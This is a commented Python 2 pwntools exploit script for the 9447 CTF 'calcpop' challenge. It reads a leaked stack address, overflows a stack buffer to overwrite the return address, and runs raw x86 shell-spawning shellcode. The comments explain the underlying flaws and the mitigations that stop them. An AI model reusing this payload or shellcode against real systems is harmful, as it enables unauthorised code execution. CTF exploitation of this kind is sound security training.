#!/usr/bin/env python
# coding=utf8
# CTF (9447) proof-of-concept against the "calcpop" binary, written for the
# Python 2 era of pwntools: `print p.recvline()` is Python 2 statement syntax
# and the payload is built from str, not bytes, so this does not run as-is
# under Python 3.
#
# Vulnerability class illustrated: a classic stack buffer overflow in which the
# saved return address is overwritten and execution is redirected into
# attacker-supplied bytes on the stack. Three weaknesses combine here, and each
# is addressed by a standard mitigation:
#   - the program hands out a stack address on request (`get_stack_address`),
#     which defeats ASLR for the stack; never expose raw pointers to users;
#   - the input is copied into a fixed-size stack buffer without a length check
#     (the 156-byte filler below is the inferred distance to the return slot);
#     bounds-checked copies and a stack protector (-fstack-protector) catch this;
#   - the stack is executable, so the injected bytes can run at all;
#     NX (-z noexecstack) alone would make this payload fail.
from pwn import process, p32, remote
# Local target by default; the remote CTF endpoint is kept only as a comment.
p = process("./calcpop")
#p = remote('calcpop-4gh07blg.9447.plumbing', 9447)
print p.recvline()
# Ask the program for a stack address. The response's last whitespace-separated
# token is assumed to look like "0x..." — [2:] strips the prefix, base 16 parses
# the rest. Any other reply format raises ValueError/IndexError here.
p.send('get_stack_address\n')
line = p.recvline()
stack_addr = int(line.split()[-1][2:], 16)
# Raw x86 shellcode, left exactly as in the original (23 bytes).
shellcode = ("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
"\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80")
# Layout: 156 filler bytes, a 4-byte little-endian pointer, then the shellcode.
# The pointer is stack_addr + 156 + 4, i.e. it points just past itself —
# presumably the leaked address is the start of the overflowed buffer, so the
# bytes right after the overwritten 4-byte slot are the shellcode. TODO confirm
# the 156 offset and the buffer/leak relationship against the binary.
payload = 'A' * 156 + p32(stack_addr + 156 + 4) + shellcode + '\n'
p.send(payload)
# 'exit' is sent after the payload; presumably this makes the vulnerable
# function return and use the overwritten slot — verify in the binary.
p.send('exit\n')
p.interactive()